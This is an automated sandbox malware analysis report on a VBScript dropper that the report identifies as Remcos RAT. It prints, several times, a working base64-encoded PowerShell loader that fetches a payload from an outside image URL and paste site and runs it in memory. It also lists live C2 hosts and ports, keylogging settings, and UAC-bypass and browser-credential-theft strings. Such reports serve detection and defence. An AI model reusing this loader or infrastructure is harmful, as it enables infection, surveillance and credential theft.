Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BBVA S.A..vbs

Overview

General Information

Sample name:BBVA S.A..vbs
Analysis ID:1576754
MD5:3c217b6a70e1ff5e6ecb71ca0e89644a
SHA1:d158bcee429368797c22f4c2f9a305c2ff37beae
SHA256:4e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9
Tags:vbsuser-lowmal3
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3556 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7708 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_compiler.exe (PID: 7924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
        • wscript.exe (PID: 4996 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • wscript.exe (PID: 7864 cmdline: wscript.exe C:\ProgramData\haematachometer.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_compiler.exe (PID: 2184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • aspnet_compiler.exe (PID: 4544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 9 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          21.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            21.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              21.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                21.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6b6f8:$a1: Remcos restarted by watchdog!
                • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                21.2.aspnet_compiler.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65a04:$str_b2: Executing file:
                • 0x6683c:$str_b3: GetDirectListeningPort
                • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x66380:$str_b7: \update.vbs
                • 0x65a2c:$str_b9: Downloaded file:
                • 0x65a18:$str_b10: Downloading file:
                • 0x65abc:$str_b12: Failed to upload file:
                • 0x66804:$str_b13: StartForward
                • 0x66824:$str_b14: StopForward
                • 0x662d8:$str_b15: fso.DeleteFile "
                • 0x6626c:$str_b16: On Error Resume Next
                • 0x66308:$str_b17: fso.DeleteFolder "
                • 0x65aac:$str_b18: Uploaded file:
                • 0x65a6c:$str_b19: Unable to delete:
                • 0x662a0:$str_b20: while fso.FileExists("
                • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 7 entries

                Other

                SourceRuleDescriptionAuthorStrings
                amsi64_3704.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi64_3704.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                    amsi64_7972.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi64_7972.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Base64 Encoded PowerShell Command Detected
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRl
                        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVt